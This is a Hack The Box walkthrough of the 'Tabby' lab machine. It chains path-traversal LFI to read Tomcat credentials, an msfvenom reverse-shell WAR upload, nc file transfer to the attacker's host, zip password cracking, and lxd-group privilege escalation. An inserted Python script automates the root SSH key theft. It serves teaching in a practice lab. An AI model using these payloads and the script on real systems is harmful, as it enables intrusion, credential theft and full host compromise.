HTB Walkthrough Tabby


Tabby was released on the 20th of June and is rated as an Easy box.


Nmap shows there are only 3 ports open: 22, 80 and 8080. On port 80 we see a web page that is vulnerable to LFI.


After finding the LFI and the right file we get credentials for the Tomcat server running on port 8080, and with those we obtain a shell with Metasploit. After some enumeration we find a password-protected zip file; after brute forcing its password we can switch to the user ash and get the user flag.


The id command shows ash is a member of the lxd group, which we can use to get root privileges.



nmap -sC -sV


When we visit port 80 we get a page that also leaks a hostname and an e-mail address.

Adding the hostname to my hosts file:

When we visit the page again using the hostname we get the same page.

In the background I start gobuster to see if there are any other interesting files or directories:

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php

When we click on the news link we get a page not found, but the link itself looks interesting:


This link looks like it could be vulnerable to LFI (local file inclusion).

Let’s investigate this with Burp:

When we replay the request we keep getting "unknown host". At first I thought there was brute force detection and that gobuster had got me locked out, but after some investigation it turned out that was not the case.

When we change the Host header to the hostname leaked earlier we get a page.

Now it’s time to see if there is an LFI.

Change the request to:

GET /news.php?file=/../../../../../../../../../etc/passwd

Now it’s time to see if we can find any interesting files.

When we look at port 8080 we see Tomcat is installed and the default page describes how to authenticate. With this knowledge I start searching for the Tomcat files that could give me these credentials.

The Tomcat page already mentions a few locations:






The last one doesn’t exist, which is a bit odd.

Since /usr/share/tomcat9 is the home folder, I checked whether an etc folder existed there, and it did:

GET /news.php?file=/../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml

This page also shows that this is a default location:

We found credentials for Tomcat:


We cannot log in to:

but there is a second one:

and we are logged in:

Normally we could now upload a WAR file through the manager web interface and get a shell, but that is not possible this time.

Method 1 Shell with Metasploit:

There is a Metasploit module we can try to get a shell:


use exploit/multi/http/tomcat_mgr_deploy

Setting the options:

After running it we obtain our shell:

Method 2 Shell With Curl:

First we need to create a malicious WAR file, which we can do with msfvenom:

msfvenom -p java/meterpreter/reverse_tcp LHOST= LPORT=81 -f war -o secwalk.war

Run the listener:

msfconsole -x "use exploit/multi/handler; set PAYLOAD java/meterpreter/reverse_tcp; set LHOST; set LPORT 81; run"

The curl command to upload the WAR file:

curl -T secwalk.war http://tomcat:\$3cureP4s5w0rd123\!@


And we have our shell:

Getting the other user:

After looking around we find a zip file named

Transfer the file to my machine:

On the victim machine: nc -w 3 81 <

On my machine: nc -l -p 81 >

When we try to unzip it, it turns out to be password protected. I used fcrackzip to brute force the password:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u

Password found:



The files in the zip didn’t contain anything interesting, so let’s try whether the password also works for the user ash:

We got our user shell:

Privilege escalation

The id command shows ash is a member of the lxd group.

It could be vulnerable to this, so let’s try it out:


git clone

cd lxd-alpine-builder/


python -m SimpleHTTPServer 80

On the target machine:


lxc image import alpine-v3.12-x86_64-20200621_0657.tar.gz --alias secwalk

lxc init secwalk ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/secwalk/ recursive=true

lxc start ignite

lxc exec ignite /bin/sh


The host filesystem is mounted at the path we gave in the device add command, /mnt/secwalk, so root’s key has to be read under that mount and not from the container’s own /root:

cd /mnt/secwalk

cat root/.ssh/id_rsa

On my machine, after saving the key as id_rsa (ssh refuses a key file with looser permissions):

chmod 600 id_rsa

ssh -i id_rsa root@
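The lxd steps above as one script with the checks the manual sequence skips: confirm the lxd group membership first, import the image only if the alias is not there yet, and read root's key from under the mount point rather than from the container's own /root. This is an added example, not code from the original walkthrough; the alias, container name and mount point are assumptions passed in as arguments, and the Alpine tarball must already be on the target.

```python
"""Added example (not code from the original walkthrough): the lxd-group
privilege escalation as one script, with the checks the manual steps skip.
Image alias, container name and mount point are assumptions passed as
arguments; the Alpine image tarball must already be on the target."""
import os
import subprocess
import sys


def lxd_group_member(id_output):
    """True if the groups= field of `id` output names lxd, e.g. '116(lxd)'."""
    for part in id_output.split():
        if part.startswith("groups="):
            groups = part[len("groups="):].split(",")
            return any(g.split("(")[-1].rstrip(")") == "lxd" for g in groups)
    return False


def host_path(mountpoint, path):
    """Where a host file shows up inside the container once / is mounted at
    `mountpoint`. The container's own /root/.ssh is NOT the host's: read
    root's key under the mount, not at /root."""
    return os.path.join(mountpoint, path.lstrip("/"))


def lxc(*args):
    return subprocess.run(["lxc", *args], check=True, text=True, capture_output=True).stdout


def escalate(image_tar, alias="secwalk", name="ignite", mountpoint="/mnt/secwalk"):
    id_out = subprocess.run(["id"], text=True, capture_output=True).stdout
    if not lxd_group_member(id_out):
        sys.exit("not in the lxd group; this path does not apply")
    if alias not in lxc("image", "list", "--format", "csv"):
        lxc("image", "import", image_tar, "--alias", alias)
    # privileged container + host root mounted in: uid 0 inside is uid 0 on that tree
    lxc("init", alias, name, "-c", "security.privileged=true")
    lxc("config", "device", "add", name, "hostroot", "disk",
        "source=/", f"path={mountpoint}", "recursive=true")
    lxc("start", name)
    key = lxc("exec", name, "--", "cat", host_path(mountpoint, "/root/.ssh/id_rsa"))
    # ssh refuses a key file with looser modes, so create it 0600 from the start
    fd = os.open("id_rsa", os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(key)
    return "id_rsa"


if __name__ == "__main__":
    # python3 lxd_root.py alpine-v3.12-x86_64-20200621_0657.tar.gz
    if len(sys.argv) != 2:
        sys.exit("usage: python3 lxd_root.py <alpine-image.tar.gz>")
    print("saved host root key to", escalate(sys.argv[1]))
```

If `lxc init` fails because no storage pool or network exists, the host never ran `lxd init`; a member of the lxd group can run `lxd init --auto` and retry.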

And we successfully rooted this machine.

Made by S3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.
